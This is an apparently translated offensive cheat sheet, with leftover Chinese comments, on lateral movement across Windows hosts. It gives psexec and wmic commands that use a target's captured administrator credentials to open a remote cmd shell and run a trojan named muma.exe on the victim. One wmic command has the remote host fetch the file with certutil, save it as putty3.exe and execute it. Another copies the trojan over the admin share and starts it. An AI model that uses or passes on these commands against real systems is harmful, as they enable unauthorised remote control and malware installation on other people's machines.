All the following experiments are in a working group environment
psexec
psexec.exe \\ip –accepteula -u username -p password program.exe
psexec.exe \\host -accepteula -u domain\username -p password -d -c
#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。
If it is a domain environment, the command is PsExec.exe \\ 192.168.23.99 -u test\lisi -p 123 -c cmd
After obtaining the account and password of the other party's host and the other party opens port 445, you can use psexec to execute remote commands.
psexec \\172.16.99.233 -u administrator -p 123 -c cmd.exe to get cmdshell
psexec \\172.16.99.233 -u administrator -p 123 -c muma.exe
#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。
Make the 172.16.99.233 host execute the muma.exe file on 172.16.99.235. To achieve the purpose of executing local files on the remote host. The attacking machine is 172.16.99.235, and the file muma.exe is also on the host 172.16.99.235, but through the above command, the file can be executed on the host 172.16.99.233 to achieve the effect of remote control.
wmic
Method 1: Control the remote host to download and execute files
wmic /node:172.16.99.233 /user:Administrator /password:123 process call create "cmd /c certutil.exe -urlcache -split -f http://172.16.99.233/muma.exe c:/windows/temp/putty3.exe & c:/windows/temp/putty3.exe"
#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。
The meaning of the above command is to connect to 172.16.99.233 and create a process. This process uses cmd to execute the command to download the file at http://172.16.99.233/muma.exe and save it to the local c:/windows/temp/ putty3.exe and execute it.
Method 2: Copy local files to the remote host and control the execution of the remote host
copy muma.exe \\172.16.99.233\c$\windows\temp\test.exe ##IPC拷贝木马文件
wmic /node:172.16.99.233 /user:administrator /password:123 process call create “c:\windows\temp\test.exe”
#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。
